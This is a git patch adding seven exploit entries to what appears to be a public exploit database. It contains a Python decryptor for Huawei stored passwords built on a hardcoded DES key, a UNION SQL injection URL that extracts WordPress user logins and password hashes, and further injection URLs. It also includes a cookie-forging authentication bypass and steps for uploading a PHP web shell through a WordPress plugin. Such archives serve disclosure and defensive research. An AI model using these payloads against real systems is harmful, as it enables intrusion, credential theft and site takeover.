From b0a05de4d08b61f8efd2b10b8b87a994d5b90ebc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 31 Aug 2015 05:02:11 +0000 Subject: [PATCH] DB: 2015-08-31 7 new exploits --- files.csv | 7 ++++ platforms/hardware/remote/38020.py | 63 ++++++++++++++++++++++++++++ platforms/multiple/webapps/38016.txt | 9 ++++ platforms/php/webapps/37998.txt | 36 ++++++++++++++++ platforms/php/webapps/38015.txt | 22 ++++++++++ platforms/php/webapps/38017.txt | 8 ++++ platforms/php/webapps/38018.txt | 7 ++++ platforms/php/webapps/38019.txt | 7 ++++ 8 files changed, 159 insertions(+) create mode 100755 platforms/hardware/remote/38020.py create mode 100755 platforms/multiple/webapps/38016.txt create mode 100755 platforms/php/webapps/37998.txt create mode 100755 platforms/php/webapps/38015.txt create mode 100755 platforms/php/webapps/38017.txt create mode 100755 platforms/php/webapps/38018.txt create mode 100755 platforms/php/webapps/38019.txt diff --git a/files.csv b/files.csv index d36090a40..fb221f3c7 100755 --- a/files.csv +++ b/files.csv @@ -34311,6 +34311,7 @@ id,file,description,date,author,platform,type,port 37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting Vulnerability",2012-10-31,"Anthony Trummer",asp,webapps,0 37996,platforms/windows/remote/37996.txt,"Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability",2012-10-31,"Zhao Liang",windows,remote,0 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030 +37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0 38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80 @@ -34324,3 +34325,9 @@ id,file,description,date,author,platform,type,port 38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0 38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22 +38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0 +38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection Vulnerability",2012-11-09,anonymous,multiple,webapps,0 +38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme 'ID' Parameter SQL Injection Vulnerability",2012-11-09,sil3nt,php,webapps,0 +38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 +38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin 'eid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 +38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0 diff --git a/platforms/hardware/remote/38020.py b/platforms/hardware/remote/38020.py new file mode 100755 index 000000000..27489bb39 --- /dev/null +++ b/platforms/hardware/remote/38020.py @@ -0,0 +1,63 @@ +source: http://www.securityfocus.com/bid/56510/info + +Multiple Huawei products are prone to a weak password encryption weakness. + +Successful exploits may allow an attacker to decrypt stored passwords; this may aid in further attacks. + +The following are vulnerable: + +Huawei Quidway series +Huawei CX600 V600R001 +Huawei CX600 V600R003C00SPC900 +Huawei ME60 V600R002C07 and prior versions +AR 19/29/49 R2207 and prior versions + +from Crypto.Cipher import DES + +def decode_char(c): + if c == 'a': + r = '?' + else: + r = c + return ord(r) - ord('!') + +def ascii_to_binary(s): + assert len(s) == 24 + + out = [0]*18 + i = 0 + j = 0 + + for i in range(0, len(s), 4): + y = decode_char(s[i + 0]) + y = (y << 6) & 0xffffff + + k = decode_char(s[i + 1]) + y = (y | k) & 0xffffff + y = (y << 6) & 0xffffff + + k = decode_char(s[i + 2]) + y = (y | k) & 0xffffff + y = (y << 6) & 0xffffff + + k = decode_char(s[i + 3]) + y = (y | k) & 0xffffff + + out[j+2] = chr(y & 0xff) + out[j+1] = chr((y>>8) & 0xff) + out[j+0] = chr((y>>16) & 0xff) + + j += 3 + + return "".join(out) + +def decrypt_password(p): + r = ascii_to_binary(p) + + r = r[:16] + + d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB) + r = d.decrypt(r) + + return r.rstrip("\x00") + diff --git a/platforms/multiple/webapps/38016.txt b/platforms/multiple/webapps/38016.txt new file mode 100755 index 000000000..dace94563 --- /dev/null +++ b/platforms/multiple/webapps/38016.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/56474/info + +ESRI ArcGIS for Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ESRI ArcGIS for Server 10.1 is vulnerable; other versions may also be affected. + +http://www.example.com:6080/arcgis/rest/services//query?f=json&where=featured%3Dtrue&returnGeometry=true&spatialRel=esriSpatialRelIntersects \ No newline at end of file diff --git a/platforms/php/webapps/37998.txt b/platforms/php/webapps/37998.txt new file mode 100755 index 000000000..93a94c337 --- /dev/null +++ b/platforms/php/webapps/37998.txt @@ -0,0 +1,36 @@ +# Exploit Title: Wordpress Responsive Thumbnail Slider Arbitrary File Upload +# Date: 2015/8/29 +# Exploit Author: Arash Khazaei +# Vendor Homepage: +https://wordpress.org/plugins/wp-responsive-thumbnail-slider/ +# Software Link: +https://downloads.wordpress.org/plugin/wp-responsive-thumbnail-slider.zip +# Version: 1.0 +# Tested on: Kali , Iceweasel Browser +# CVE : N/A +# Contact : http://twitter.com/0xClay +# Email : 0xclay@gmail.com +# Site : http://bhunter.ir + +# Intrduction : + +# Wordpress Responsive Thumbnail Slider Plugin iS A With 6000+ Active +Install +# And Suffer From A File Upload Vulnerability Allow Attacker Upload Shell +As A Image . +# Authors , Editors And Of Course Administrators This Vulnerability To Harm +WebSite . + +# POC : + +# For Exploiting This Vulnerability : + +# Go To Add Image Section And Upload File By Self Plugin Uploader +# Then Upload File With Double Extension Image +# And By Using A BurpSuite Or Tamper Data Change The File Name From +Shell.php.jpg To Shell.php +# And Shell Is Uploaded . :) + + + + diff --git a/platforms/php/webapps/38015.txt b/platforms/php/webapps/38015.txt new file mode 100755 index 000000000..a59c75ec2 --- /dev/null +++ b/platforms/php/webapps/38015.txt @@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/56465/info + +AWCM is prone to an authentication-bypass and multiple security-bypass vulnerabilities. + +Attackers can exploit these vulnerabilities to bypass certain security restrictions, perform unauthorized actions; which may aid in further attacks. + +AWCM 2.2 is vulnerable; other versions may also be affected. + +Authentication Bypass: + +http://www.example.com/awcm/cookie_gen.php?name=\'key\'&content=\'value\' +ex) http://targethost/awcm/cookie_gen.php? +name=awcm_member&content=123456 + +Security Bypass: + +[form action=\"http://www.example.com/awcm/show_video.php?coment=exploit\" +method=\"post\"] +[input type=\"hidden\" name=\"coment\" value=\'insert +uninvited comments 2\' /] +[input type=\"submit\" value=\"Submit\"] + diff --git a/platforms/php/webapps/38017.txt b/platforms/php/webapps/38017.txt new file mode 100755 index 000000000..71afdae24 --- /dev/null +++ b/platforms/php/webapps/38017.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/56477/info + +The Kakao theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/wp-content/themes/kakao/sonHaberler.php?ID=-1+union+select+1,2,3,4,5,group_concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wp_users-- + diff --git a/platforms/php/webapps/38018.txt b/platforms/php/webapps/38018.txt new file mode 100755 index 000000000..6d9b0c991 --- /dev/null +++ b/platforms/php/webapps/38018.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/56478/info + +The PHP Event Calendar plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/wp-content/plugins/Calendar-Script/load-events.php?cid=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/38019.txt b/platforms/php/webapps/38019.txt new file mode 100755 index 000000000..2ed7fd41e --- /dev/null +++ b/platforms/php/webapps/38019.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/56479/info + +The Eco-annu plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/wp-content/plugins/eco-annu/map.php?eid=[SQL] \ No newline at end of file